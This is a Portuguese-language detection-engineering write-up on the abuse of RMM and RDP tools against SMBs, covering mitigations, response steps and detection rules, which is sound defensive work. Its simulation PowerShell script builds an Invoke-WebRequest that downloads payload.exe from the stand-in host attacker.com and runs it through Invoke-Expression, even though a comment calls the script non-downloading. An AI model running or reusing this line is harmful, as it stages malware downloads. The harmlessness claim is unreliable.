Segurança RMM para PMEs: Um Manual de Fortalecimento de Acesso Remoto
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
Os atacantes estão abusando cada vez mais de ferramentas legítimas de Monitoramento e Gerenciamento Remoto (RMM) e Serviços de Desktop Remoto (RDS) para estabelecer persistência e suportar o movimento lateral. Ferramentas como ConnectWise ScreenConnect, MeshAgent e VNC podem ser armadas através da exploração de vulnerabilidades ou instaladores trojanizados. Isso cria um desafio significativo para Pequenas e Médias Empresas, onde a atividade maliciosa pode se assemelhar de perto à administração legítima de TI.
Investigação
A análise se baseia em telemetria da Acronis de mais de 1,8 milhões de endpoints gerenciados para avaliar os riscos relacionados ao RMM para PMEs e MSPs. Os pesquisadores descobriram que 63% dos endpoints executam várias ferramentas de acesso remoto, ampliando a potencial superfície de ataque. O estudo agrupou o software RMM em três categorias: ferramentas para bloquear, ferramentas para monitorar e endurecer, e ferramentas para auditar e manter.
Mitigação
As organizações devem desativar serviços desnecessários de RDP através da Política de Grupo, impor a Autenticação de Nível de Rede (NLA) e exigir MFA para todas as contas de administrador de RMM. A listagem de aplicativos permitidos pode ajudar a prevenir instalações não autorizadas de RMM, enquanto a infraestrutura de RMM voltada para a internet deve ser corrigida prontamente. O roteamento de acesso remoto através de gateways VPN ou ZTNA também é recomendado para fortalecer os controles de acesso.
Resposta
Quando ferramentas RMM não autorizadas são detectadas, as organizações devem imediatamente investigar a fonte de instalação e procurar por roubo de credenciais relacionado ou movimento lateral. Atividade não autorizada do MeshAgent deve ser tratada como uma confirmação de comprometimento. A remoção automatizada pode ser ineficaz quando mecanismos de persistência estão presentes, exigindo escalonamento para resposta a incidentes manual e investigação forense mais profunda.
Fluxo de Ataque
Ainda estamos atualizando esta parte.
Detecções
Software Alternativo de Acesso/ Gerenciamento Remoto (via criação de processo)
Possível Tentativa de Execução Remota de Comando do ScreenConnect (via linha de comando)
Software Alternativo de Acesso/ Gerenciamento Remoto (via sistema)
Software Alternativo de Acesso/ Gerenciamento Remoto (via auditoria)
Uso do PowerShell para Implantação de Malware [Windows Powershell]
Detectar Mudanças de Configuração de RDP para Acesso Não Autorizado [Evento do Registro do Windows]
Execução de Simulação
Pré-requisito: O Check de Pré-vôo de Telemetria & Baseline deve ter sido aprovado.
Racional: Esta seção detalha a execução precisa da técnica adversária (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a um diagnóstico incorreto.
-
Narrativa do Ataque & Comandos: O adversário obteve acesso inicial à estação de trabalho por meio de um payload de phishing. Para estabelecer persistência e controle remoto, eles pretendem implantar um Trojan de Acesso Remoto. Eles executam um one-liner do PowerShell que, embora não esteja realmente baixando um payload nesta simulação, contém a string de assinatura
AsyncRATdentro do bloco de script para simular a fase de implantação de uma instalação de malware. Isso imita um atacante usando um script simples para baixar seu conjunto de ferramentas. -
Script de Teste de Regressão:
# Script de simulação para acionar a regra de detecção incluindo a string alvo. # Nota: Esta é uma simulação não maliciosa projetada apenas para produzir telemetria. $SimulatedMalwareName = "AsyncRAT" Write-Host "Inicializando sequência de implantação para $SimulatedMalwareName..." # Este bloco simula a lógica de um downloader/instalador $payload = "Invoke-WebRequest -Uri 'http://attacker.com/payload.exe' -OutFile '$env:TEMPmalware.exe'" # Executando a string para garantir que ela apareça no Script Block Log (Evento 4104) Invoke-Expression "Write-Output 'Implantando $SimulatedMalwareName...'; $payload" -
Comandos de Limpeza:
# Limpeza: Remover quaisquer artefatos se realmente foram criados. # Nesta simulação, nenhum arquivo foi realmente baixado. Remove-Item -Path "$env:TEMPmalware.exe" -ErrorAction SilentlyContinue Write-Host "Limpeza completa."